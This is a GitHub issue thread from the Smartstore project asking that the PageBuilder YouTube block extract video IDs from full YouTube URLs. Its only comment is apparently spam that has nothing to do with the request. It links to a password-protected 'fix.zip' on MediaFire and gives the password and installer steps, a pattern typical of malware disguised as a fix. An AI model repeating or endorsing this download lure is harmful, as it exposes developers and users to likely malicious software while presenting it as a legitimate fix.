### ISSUE TITLE
PageBuilder: YouTube Block Video ID Field Enhancement

### ISSUE THREAD

**Issue by markwoerdenweber** [smartstore/Smartstore#1169]
Parse YouTube links using regex to extract the video ID and remove unwanted characters to provide more flexibility for user input.
Convert `https://www.youtube.com/watch?v=vidID` and `https://youtu.be/vidID` to `vidID`.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
